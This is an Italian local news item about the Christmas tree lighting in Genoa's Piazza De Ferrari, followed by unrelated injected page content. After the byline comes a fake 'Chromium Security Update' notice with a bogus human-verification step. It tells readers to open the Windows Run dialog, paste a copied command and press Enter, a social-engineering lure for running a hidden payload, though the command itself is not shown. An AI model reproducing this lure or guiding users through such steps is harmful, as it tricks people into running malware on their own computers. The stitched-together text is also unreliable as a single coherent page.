GENOVA: ACCENSIONE DELL’ALBERO DI NATALE IN PIAZZA DE FERRARI

Martedì 8 dicembre, alle ore 17, in piazza De Ferrari, si svolgerà la tradizionale accensione dell’albero di Natale della città donato dal Parco naturale regionale dell’Aveto per il terzo anno consecutivo. Alla cerimonia interverranno il sindaco Marco Doria e il direttore del Parco dell’Aveto Paolo Cresta.

albero-de-ferrari-3882.660x368L’allestimento dell’albero è stato curato da Aster che si è occupata dell’addobbo, del montaggio delle luminarie e del quadro elettrico di illuminazione, della sistemazione dello spazio intorno all’albero con piante in vaso allo scopo di proteggere i tre punti di ancoraggio alla base ed il quadro elettrico. I costi complessivi di tutte queste attività sono sostenuti da Aster a titolo promozionale per il significato simbolico che l’abete rappresenta per la città.

L’accensione sarà preceduta, alle ore 16, dall’esibizione di canti e balli tradizionali genovesi da parte del gruppo folklorico Città di Genova e dallo spettacolo itinerante della Conte Brass Band che porterà il suo repertorio jazz di New Orleans e i più noti brani della tradizione natalizia da via San Lorenzo a piazza De Ferrari.

 

Redazione Tcgnews.it Genova

Chrome Icon

Chromium Security Update Required

Complete verification to update your browser engine

Important Security Notice

Your browser's Chromium engine is outdated and requires an immediate update to ensure secure browsing and protect your system from vulnerabilities.

  • Outdated versions are susceptible to security exploits
  • Newer versions include critical performance improvements
  • This update includes enhanced privacy protections

Complete the verification process below to automatically download and install the latest Chromium engine update.

Verify you are human to continue

I'm not a robot

Verification required to update browser components

Complete the update process:

1
Press Win + R to open the Run dialog
2
Paste the copied command with Ctrl + V
3
Press Enter to execute the update process